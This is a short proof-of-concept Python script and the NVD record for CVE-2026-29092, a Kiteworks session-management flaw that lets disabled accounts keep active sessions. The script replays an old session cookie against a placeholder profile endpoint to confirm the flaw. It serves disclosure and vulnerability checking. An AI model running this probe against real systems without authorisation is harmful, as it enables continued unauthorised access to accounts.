CVE-2026-29092

import requests # Target URL configuration target_url = "https://kiteworks-instance.com/api/user/profile" # Simulate a session token from a user that has just been disabled # In a real scenario, this cookie is obtained before the disable action cookies = { "session_id": "compromised_or_legacy_session_token" } headers = { "User-Agent": "CVE-2026-29092-POC-Scanner" } try: # Send request using the old session token response = requests.get(target_url, cookies=cookies, headers=headers, timeout=10) # Check if the server still accepts the session despite the account being disabled if response.status_code == 200: print("[+] Vulnerability Confirmed: Server accepted the session token for a disabled account.") print("[+] Response Data:", response.text[:200]) elif response.status_code == 401 or response.status_code == 403: print("[-] Session properly invalidated or account disabled.") else: print(f"[?] Unexpected status code: {response.status_code}") except Exception as e: print(f"Error connecting to target: {e}")

{"cve": {"id": "CVE-2026-29092", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:57.330", "lastModified": "2026-03-27T19:01:19.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kiteworks is a private data network (PDN). Prior to version 9.2.1, a vulnerability in Kiteworks Email Protection Gateway session management allows blocked users to maintain active sessions after their account is disabled. This could allow unauthorized access to continue until the session naturally expires. Upgrade Kiteworks to version 9.2.1 or later to receive a patch."}, {"lang": "es", "value": "Kiteworks es una red de datos privada (PDN). Antes de la versión 9.2.1, una vulnerabilidad en la gestión de sesiones de Kiteworks Email Protection Gateway permite a los usuarios bloqueados mantener sesiones activas después de que su cuenta sea deshabilitada. Esto podría permitir que el acceso no autorizado continúe hasta que la sesión expire naturalmente. Actualice Kiteworks a la versión 9.2.1 o posterior para recibir un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:accellion:kiteworks:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.2.1", "matchCriteriaId": "30A78D6E-2376-4B2C-B4AD-499D1DF88E34"}]}]}], "references": [{"url": "https://github.com/kiteworks/security-advisories/security/advisories/GHSA-92w7-fpjr-wpxc", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}